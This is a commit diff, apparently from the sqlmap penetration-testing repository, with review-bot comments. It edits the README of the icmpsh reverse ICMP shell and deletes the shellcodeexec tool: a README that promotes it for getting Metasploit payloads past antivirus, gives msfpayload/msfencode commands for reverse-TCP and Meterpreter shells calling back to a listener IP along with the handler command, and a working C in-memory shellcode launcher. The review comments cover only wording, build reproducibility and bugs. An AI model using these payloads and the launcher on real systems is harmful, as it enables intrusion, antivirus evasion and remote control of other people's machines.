cleanup to README files

1 parent 7198e31 commit 224e6376a64084d5fcc61e829b1f43bd3bce343f @inquisb inquisb committed Jul 16, 2012
@@ -8,14 +8,14 @@ icmpsh is a simple reverse ICMP shell with a win32 slave and a POSIX compatible
The master is straight forward to use. There are no extra libraries required for the C version.
The Perl master however has the following dependencies:
- * IO::Socket
- * NetPacket::IP
- * NetPacket::ICMP
+ * IO::Socket
+ * NetPacket::IP
+ * NetPacket::ICMP
When running the master, don't forget to disable ICMP replies by the OS. For example:
- sysctl -w net.ipv4.icmp_echo_ignore_all=1
+ sysctl -w net.ipv4.icmp_echo_ignore_all=1
If you miss doing that, you will receive information from the slave, but the slave is unlikely to receive
commands send from the master.
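Review bot: the three dependency lines and the sysctl line change only in leading whitespace, so this hunk is indentation cleanup; while in this paragraph, fix the context line `commands send from the master.` to `commands sent from the master.`, and it is worth adding that `sysctl -w` is not persistent across reboots and that `net.ipv4.icmp_echo_ignore_all` covers IPv4 only, so a master host that also answers ICMPv6 echo is not addressed by this one setting.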
@@ -29,12 +29,12 @@ The slave comes with a few command line options as outlined below:
-t host host ip address to send ping requests to. This option is mandatory!
-r send a single test icmp request containing the string "Test1234" and then quit.
- This is for testing the connection.
+ This is for testing the connection.
-d milliseconds delay between requests in milliseconds
-o milliseconds timeout of responses in milliseconds. If a response has not received in time,
- the slave will increase a counter of blanks. If that counter reaches a limit, the slave will quit.
+ the slave will increase a counter of blanks. If that counter reaches a limit, the slave will quit.
The counter is set back to 0 if a response was received.
-b num limit of blanks (unanswered icmp requests before quitting
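Review bot: again whitespace-only, but two context lines carry wording problems worth fixing in the same pass: `If a response has not received in time` should read `has not been received in time`, and `-b num limit of blanks (unanswered icmp requests before quitting` is missing its closing parenthesis.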
@@ -1,7 +1,3 @@
Files in this folder can be used to compile auxiliary program that can
be used for running command prompt commands skipping standard "cmd /c" way.
-They are licensed under the terms of the GNU Lesser General Public License
-and it's compiled version is available on the official sqlmap subversion
-repository[1].
-
-[1] https://svn.sqlmap.org/sqlmap/trunk/sqlmap/shell/runcmd.exe_
+They are licensed under the terms of the GNU Lesser General Public License.
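Review bot: dropping the dead svn URL is right, but the replacement sentence now leaves the reader with no pointer to where the prebuilt `runcmd.exe` comes from or how to rebuild it from the files in this folder; suggest adding either the current source location or a one-line build command, the way the shellcodeexec folder README in this same commit points at its upstream repository. Minor grammar in the context line: `compile auxiliary program that can` should be `compile an auxiliary program that can`.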
@@ -1,126 +0,0 @@
-= Short description =
-
-shellcodeexec is a small script to execute in memory a sequence of opcodes.
-
-
-= Background =
-
-Most of the shellcode launchers out there, including proof of concepts
-part of many "security" books, detail how to allocate a memory page as
-readable/writable/executable on POSIX systems, copy over your shellcode
-and execute it. This works just fine. However, it is limited to POSIX,
-does not necessarily consider 64-bit architecture and Windows systems.
-
-
-= Description =
-
-This script and the relevant project files (Makefile and Visual Studio
-files) allow you to compile the tool once then run your shellcode across
-different architectures and operating systems.
-
-Moreover, it solves a common real world issue: the target system's anti
-virus software blocking a Metasploit-generated payload stager (either EXE
-of ELF). Take for instance the following command line:
-
- $ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=process LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/shikata_ga_nai -o /tmp/payload.exe -t exe
-
-This generates a Metasploit payload stager, payload.exe, that as soon as
-it lands on the AV-protected target system is recognized as malicious and
-potentially blocked (depending on the on-access scan settings) by many
-anti virus products. At the time of writing this text, 21 out 41 anti
-viruses detect it as malicious - http://goo.gl/HTw7o. By encoding it
-multiple times with msfencode, less AV softwares detect it, still a lot.
-
-I have been surfing the Net and found some interesting tutorials and
-guides about packing, compressing, obfuscating and applying IDA-foo to
-portable executables et similar in order to narrow down the number of AV
-products that can detect it as a malicious file. This is all interesting,
-but does not stop few hard-to-die anti viruses to detect your backdoor.
-
-So the question is, how cool would it be to have a final solution to avoid
-all this hassle? This is exactly where this tool comes into play!
-
-
-= Features =
-
-shellcodeexec:
-
-* Can be compiled and works on POSIX (Linux/Unices) and Windows systems.
-
-* Can be compiled and works on 32-bit and 64-bit architectures.
-
-* As far as I know, no AV detect it as malicious.
-
-* Works in DEP/NX-enabled environments: it allocates the memory page where
- it stores the shellcode as +rwx - Readable Writable and eXecutable.
-
-* It supports alphanumeric encoded payloads: you can pipe your binary-encoded
- shellcode (generated for instance with Metasploit's msfpayload) to
- Metasploit's msfencode to encode it with the alpha_mixed encoder. Set the
- BufferRegister variable to EAX registry where the address in memory of
- the shellcode will be stored, to avoid get_pc() binary stub to be
- prepended to the shellcode.
-
-* Spawns a new thread where the shellcode is executed in a structure
- exception handler (SEH) so that if you wrap shellcodeexec into your own
- executable, it avoids the whole process to crash in case of unexpected
- behaviours.
-
-
-= HowTo =
-
-1. Generate a Metasploit shellcode and encode it with the alphanumeric
- encoder. For example for a Linux target:
-
- $ msfpayload linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
-
- Or for a Windows target:
-
- $ msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R | msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
-
-
-2. Execute the Metasploit multi/handler listener on your machine. For
- example for a Linux target:
-
- $ msfcli multi/handler PAYLOAD=linux/x86/shell_reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E
-
- Or for a Windows target:
-
- $ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E
-
-
-3. Execute the alphanumeric-encoded shellcode with this tool. For example
- on the Linux target:
-
- $ ./shellcodeexec <msfencode's alphanumeric-encoded payload>
-
- Or, on the Windows target:
-
- C:\WINDOWS\Temp>shellcodeexec.exe <msfencode's alphanumeric-encoded payload>
-
-
-= License =
-
-This source code is free software; you can redistribute it and/or
-modify it under the terms of the GNU Lesser General Public
-License as published by the Free Software Foundation; either
-version 2.1 of the License, or (at your option) any later version.
-
-This library is distributed in the hope that it will be useful,
-but WITHOUT ANY WARRANTY; without even the implied warranty of
-MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
-Lesser General Public License for more details.
-
-You should have received a copy of the GNU Lesser General Public
-License along with this library; if not, write to the Free Software
-Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
-
-
-= Author =
-
-Bernardo Damele A. G. <bernardo.damele@gmail.com>
-
-
-= Homepage =
-
-https://github.com/inquisb/shellcodeexec
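Review bot: deleting the README wholesale is reasonable now that the `Homepage` line at the end of the hunk (`https://github.com/inquisb/shellcodeexec`) is the canonical source, but nothing in this commit records which upstream revision the binaries kept in this folder were built from; consider noting the upstream commit or release tag next to the homepage link so the shipped binaries can be traced back to exact source.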
@@ -0,0 +1,4 @@
+Binary files in this folder are data files used by sqlmap on the target
+system, but not executed on the system running sqlmap. They are licensed
+under the terms of the GNU Lesser General Public License and their source
+code is available on https://github.com/inquisb/shellcodeexec.
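Review bot: stating that these binaries are "not executed on the system running sqlmap" is useful for reviewers and for anyone writing an allow-list policy, but the README should also give a way to verify the shipped files: list a SHA-256 for each binary (or point to a tagged release artifact) alongside the source link, since a binary checked into a repository with only a link to its source cannot otherwise be matched to that source.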
@@ -1,7 +0,0 @@
-32:
- gcc -Wall -Os shellcodeexec.c -o shellcodeexec
- strip -sx shellcodeexec
-
-64:
- gcc -Wall -Os shellcodeexec.c -fPIC -o shellcodeexec
- strip -sx shellcodeexec
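Review bot: the two recipes differ only by `-fPIC`, and neither passes `-m32` or `-m64`, so the `32:` and `64:` labels only hold if the host toolchain defaults to that width; if this build note is moving upstream rather than being dropped, make the target width explicit there (`-m32` / `-m64`) so the shipped 32-bit and 64-bit binaries are reproducible from a single build host.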
@@ -1,138 +0,0 @@
-/*
- shellcodeexec - Script to execute in memory a sequence of opcodes
- Copyright (C) 2011 Bernardo Damele A. G.
- web: http://bernardodamele.blogspot.com
- email: bernardo.damele@gmail.com
-
- This source code is free software; you can redistribute it and/or
- modify it under the terms of the GNU Lesser General Public
- License as published by the Free Software Foundation; either
- version 2.1 of the License, or (at your option) any later version.
-
- This library is distributed in the hope that it will be useful,
- but WITHOUT ANY WARRANTY; without even the implied warranty of
- MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
- Lesser General Public License for more details.
-
- You should have received a copy of the GNU Lesser General Public
- License along with this library; if not, write to the Free Software
- Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
-*/
-
-#include <sys/types.h>
-#include <stdio.h>
-#include <string.h>
-#include <stdlib.h>
-#include <time.h>
-#include <ctype.h>
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
-#include <windows.h>
-DWORD WINAPI exec_payload(LPVOID lpParameter);
-#else
-#include <sys/mman.h>
-#include <sys/wait.h>
-#include <unistd.h>
-#endif
-
-int sys_bineval(char *argv);
-
-int main(int argc, char *argv[])
-{
- if (argc < 2) {
- printf("Run:\n\tshellcodeexec <alphanumeric-encoded shellcode>\n");
- exit(-1);
- }
-
- sys_bineval(argv[1]);
-
- exit(0);
-}
-
-int sys_bineval(char *argv)
-{
- size_t len;
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
- int pID;
- char *code;
-#else
- int *addr;
- size_t page_size;
- pid_t pID;
-#endif
-
- len = (size_t)strlen(argv);
-
-#if defined(_WIN32) || defined(_WIN64) || defined(__WIN32__) || defined(WIN32)
- // allocate a +rwx memory page
- code = (char *) VirtualAlloc(NULL, len+1, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
-
- // copy over the shellcode
- strncpy(code, argv, len);
-
- // execute it by ASM code defined in exec_payload function
- WaitForSingleObject(CreateThread(NULL, 0, exec_payload, code, 0, &pID), INFINITE);
-#else
- pID = fork();
- if(pID<0)
- return 1;
-
- if(pID==0)
- {
- page_size = (size_t)sysconf(_SC_PAGESIZE)-1; // get page size
- page_size = (len+page_size) & ~(page_size); // align to page boundary
-
- // mmap an +rwx memory page
- addr = mmap(0, page_size, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_SHARED|MAP_ANON, 0, 0);
-
- if (addr == MAP_FAILED)
- return 1;
-
- // copy over the shellcode
- strncpy((char *)addr, argv, len);
-
- // execute it
- ((void (*)(void))addr)();
- }
-
- if(pID>0)
- waitpid(pID, 0, WNOHANG);
-#endif
-
- return 0;
-}
-
-#if defined(_WIN64)
-void __exec_payload(LPVOID);
-
-DWORD WINAPI exec_payload(LPVOID lpParameter)
-{
- __try
- {
- __exec_payload(lpParameter);
- }
- __except(EXCEPTION_EXECUTE_HANDLER)
- {
- }
-
- return 0;
-}
-#elif defined(_WIN32) || defined(__WIN32__) || defined(WIN32)
-DWORD WINAPI exec_payload(LPVOID lpParameter)
-{
- __try
- {
- __asm
- {
- mov eax, [lpParameter]
- call eax
- }
- }
- __except(EXCEPTION_EXECUTE_HANDLER)
- {
- }
-
- return 0;
-}
-#endif
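Review bot: two defects in the deleted copy should be confirmed fixed upstream rather than silently lost with the file: on the Windows path the `VirtualAlloc` result is handed straight to `strncpy` without a NULL check, so an allocation failure becomes a write through a null pointer; on the POSIX path the parent calls `waitpid(pID, 0, WNOHANG)`, which returns immediately, so `main` proceeds to `exit(0)` while the child is still running and the parent never learns whether the child's `mmap` succeeded (its `return 1` after `MAP_FAILED` is never observed). Also, `&pID` passed as `CreateThread`'s `LPDWORD` argument is an `int *`, which compiles only with a warning; it should be a `DWORD`.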
@@ -1,25 +0,0 @@
-Before compiling, an enviroment variable has to be set.
-
---------------------------------------------------------------------------
-Variable name Variable description
---------------------------------------------------------------------------
-PLATFORM_SDK_DIR Directory where the Platform SDK is installed
-
-
-Procedure for setting environment variables on Windows:
-My Computer -> Properties -> Advanced -> Environment Variables
-User variables -> New
-
-
-Sample value:
---------------------------------------------------------------------------
-Variable name Variable value
---------------------------------------------------------------------------
-PLATFORM_SDK_DIR C:\Program Files\Microsoft Platform SDK for Windows Server 2003 R2
-
-
-Notes:
-
-To get as small portable executable as possible compile as follows:
-* Use Visual C++ 2005
-* Strip the executable with UPX
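Review bot: this is the only place that records the toolchain for the shipped Windows binary (Visual C++ 2005 against the Platform SDK, then UPX); if the .exe kept in the folder was produced this way, the new README should say so, because a UPX-packed file cannot be compared byte-for-byte against a fresh compiler output and reviewers will otherwise have no way to reproduce it. Typo in the first context line: `enviroment` should be `environment`.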
@@ -1,20 +0,0 @@
-
-Microsoft Visual Studio Solution File, Format Version 9.00
-# Visual C++ Express 2005
-Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "shellcodeexec", "shellcodeexec\shellcodeexec.vcproj", "{4D362A3E-CA53-444C-B1C8-C49641823875}"
-EndProject
-Global
- GlobalSection(SolutionConfigurationPlatforms) = preSolution
- Debug|Win32 = Debug|Win32
- Release|Win32 = Release|Win32
- EndGlobalSection
- GlobalSection(ProjectConfigurationPlatforms) = postSolution
- {4D362A3E-CA53-444C-B1C8-C49641823875}.Debug|Win32.ActiveCfg = Debug|Win32
- {4D362A3E-CA53-444C-B1C8-C49641823875}.Debug|Win32.Build.0 = Debug|Win32
- {4D362A3E-CA53-444C-B1C8-C49641823875}.Release|Win32.ActiveCfg = Release|Win32
- {4D362A3E-CA53-444C-B1C8-C49641823875}.Release|Win32.Build.0 = Release|Win32
- EndGlobalSection
- GlobalSection(SolutionProperties) = preSolution
- HideSolutionNode = FALSE
- EndGlobalSection
-EndGlobal
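Review bot: the solution's `Project(...)` line references `shellcodeexec\shellcodeexec.vcproj`, and no hunk for that file appears in the diff shown here; confirm the .vcproj is removed in the same commit so the folder is not left with an orphaned project file.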